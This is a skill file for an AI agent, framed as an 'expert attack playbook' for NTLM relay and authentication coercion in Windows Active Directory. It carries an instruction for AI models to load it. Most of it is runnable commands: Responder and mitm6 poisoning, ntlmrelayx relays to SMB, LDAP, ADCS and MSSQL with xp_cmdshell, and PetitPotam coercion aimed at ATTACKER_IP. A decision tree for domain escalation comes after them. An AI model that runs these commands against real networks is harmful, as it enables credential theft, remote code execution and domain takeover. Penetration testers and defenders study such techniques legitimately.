| name | ntlm-relay-coercion |
| description | NTLM relay and authentication coercion playbook. Use when capturing and relaying NTLM authentication to escalate privileges via SMB, LDAP, HTTP, or MSSQL relay targets, combined with PetitPotam, PrinterBug, and other coercion methods. |
SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints.
0. RELATED ROUTING
Before going deep, consider loading:
Advanced Reference
Also load COERCION_METHODS.md when you need:
- Detailed coercion method comparison (PetitPotam, PrinterBug, DFSCoerce, etc.)
- RPC function-level details and prerequisites
- Coercer tool usage and discovery
1. NTLM RELAY FUNDAMENTALS
Victim Attacker (relay) Target
│ │ │
│── NTLM Auth ──→│ │ (1) Victim authenticates (coerced/poisoned)
│ │── Forward Auth ─────→│ (2) Attacker relays to target
│ │←─ Challenge ──────── │ (3) Target sends challenge
│←─ Challenge ────│ │ (4) Attacker forwards challenge to victim
│── Response ────→│ │ (5) Victim computes response
│ │── Forward Response ─→│ (6) Attacker relays response to target
│ │←─ Authenticated! ────│ (7) Target accepts → attacker has session
NTLMv1 vs NTLMv2
| Feature | NTLMv1 | NTLMv2 |
|---|
| Security | Weak (crackable to NTLM hash) | Stronger (but still relayable) |
| Relay | Yes | Yes |
| Crack to hash | Yes (rainbow tables, crack.sh) | Offline brute-force only |
| Downgrade | Force via Responder --lm | Default in modern Windows |
2. RELAY TARGET MATRIX
| Target Protocol | What You Get | Signing Required by Default? | EPA/Channel Binding? |
|---|
| SMB | Command exec (if admin), file access | DCs: Yes, Workstations: No | No |
| LDAP | ACL modification, RBCD, shadow creds, add computer | DCs: No (negotiated) | No (unless configured) |
| LDAPS | Same as LDAP but encrypted | N/A | Yes (channel binding) |
| HTTP (ADCS) | Certificate enrollment (ESC8) | No | Depends on config |
| MSSQL | SQL queries, xp_cmdshell | No | No |
| IMAP/SMTP | Email access | No | No |
| RPC | Various (CA enrollment for ESC11) | Depends | No |
Signing Check
crackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt
nmap -p 445 --script smb2-security-mode TARGET_RANGE
3. RESPONDER — CREDENTIAL CAPTURE
LLMNR/NBT-NS/WPAD/mDNS Poisoning
responder -I eth0 -dwP
responder -I eth0 -A
Responder + Relay (Don't Capture, Relay Instead)
responder -I eth0 -dwP
ntlmrelayx.py -tf targets.txt -smb2support
4. NTLMRELAYX — RELAY EXECUTION
Relay to SMB (Admin Execution)
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -tf targets.txt -smb2support -socks
Relay to LDAP (ACL Modification)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support
ntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support
ntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain
Relay to ADCS HTTP (ESC8)
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
--adcs --template DomainController
Relay to MSSQL
ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"
5. MITM6 — IPv6 DNS TAKEOVER
mitm6 -d domain.com
ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support
6. CROSS-PROTOCOL RELAY
SMB → LDAP
Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).
ntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support
PetitPotam.py ATTACKER_IP DC01_IP
Limitation: SMB → LDAP relay fails if the source uses SMB signing negotiation that indicates relay.
WebDAV → LDAP
WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support
PetitPotam.py ATTACKER@80/test WORKSTATION_IP
7. WEBDAV-BASED COERCION
WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.
crackmapexec smb TARGET -u user -p pass -M webdav
Key advantage: HTTP-based NTLM avoids SMB signing requirements.
8. NTLM RELAY DECISION TREE
Want to relay NTLM authentication
│
├── What auth can you capture?
│ ├── Responder poisoning (passive, wait for queries)
│ ├── mitm6 (DHCPv6 DNS takeover, periodic)
│ └── Active coercion → load COERCION_METHODS.md
│
├── What target to relay to?
│ │
│ ├── Need code execution?
│ │ ├── SMB target without signing → ntlmrelayx to SMB (§4)
│ │ └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)
│ │
│ ├── Need domain escalation?
│ │ ├── LDAP signing not enforced?
│ │ │ ├── Relay to LDAP → RBCD (§4)
│ │ │ ├── Relay to LDAP → shadow credentials (§4)
│ │ │ └── Relay to LDAP → add computer + delegate (§4)
│ │ └── LDAP signing enforced?
│ │ └── Relay to ADCS HTTP (ESC8) → certificate (§4)
│ │
│ └── Need certificate?
│ └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)
│
├── Source is SMB-based?
│ ├── Target is SMB → check signing (§2)
│ ├── Target is LDAP → may work (cross-protocol, §6)
│ └── Target is HTTP → works (cross-protocol)
│
├── Source is HTTP-based (WebDAV)?
│ └── Relay to any target (no signing issues, §6/§7)
│
└── Relay fails?
├── Check signing requirements (§2)
├── Check EPA/channel binding
├── Try cross-protocol (SMB → LDAP)
└── Try WebDAV coercion (avoids SMB signing)